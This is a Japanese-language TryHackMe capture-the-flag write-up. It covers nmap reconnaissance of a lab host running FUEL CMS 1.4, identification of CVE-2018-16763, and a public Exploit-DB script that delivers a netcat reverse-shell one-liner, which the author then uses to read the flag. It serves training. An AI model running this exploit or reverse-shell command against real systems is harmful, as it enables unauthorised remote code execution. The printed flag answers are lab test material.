✒️
[THM-WriteUp] Vulnerability Capstone
Task2:Exploit the Machine (Flag Submission)
What is the name of the application running on the vulnerable machine?
とりあえずはnmapする。
root@ip-10-10-163-137:~# nmap -A 10.10.215.220
Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-12 14:48 BST
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for ip-10-10-215-220.eu-west-1.compute.internal (10.10.215.220)
Host is up (0.00030s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Welcome to FUEL CMS
MAC Address: 02:71:B3:D9:61:29 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=4/12%OT=22%CT=1%CU=39888%PV=Y%DS=1%DC=D%G=Y%M=0271B3%T
OS:M=66193BAC%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms ip-10-10-215-220.eu-west-1.compute.internal (10.10.215.220)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.68 seconds
Answer
FUEL CMS
What is the version number of this application?
namepの情報にはヴァージョン乗ってなさそう。
webアプリケーションのようなので、一旦開いてみる。
Answer
1.4
What is the number of the CVE that allows an attacker to remotely execute code on this application?
天下のExploit-DBで検索
Answer
CVE-2018-16763
What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.
上記のexploitをそのまま使う
※事前にnetcatでリスナーを起動
root@ip-10-10-163-137:~# nc -lvp 4444
root@ip-10-10-163-137:~# python3 50477.py -u http://10.10.215.220
[+]Connecting...
Enter Command $rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.163.137 4444 >/tmp/f
リバースシェルゲット
root@ip-10-10-163-137:~# nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from ip-10-10-215-220.eu-west-1.compute.internal 58230 received!
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/var/www/html/fuelcms
$ cd /home/ubuntu
$ pwd
/home/ubuntu
$ ls
flag.txt
$ cat flag.txt
THM{ACKME_BLOG_HACKED}
Answer
THM{ACKME_BLOG_HACKED}
Discussion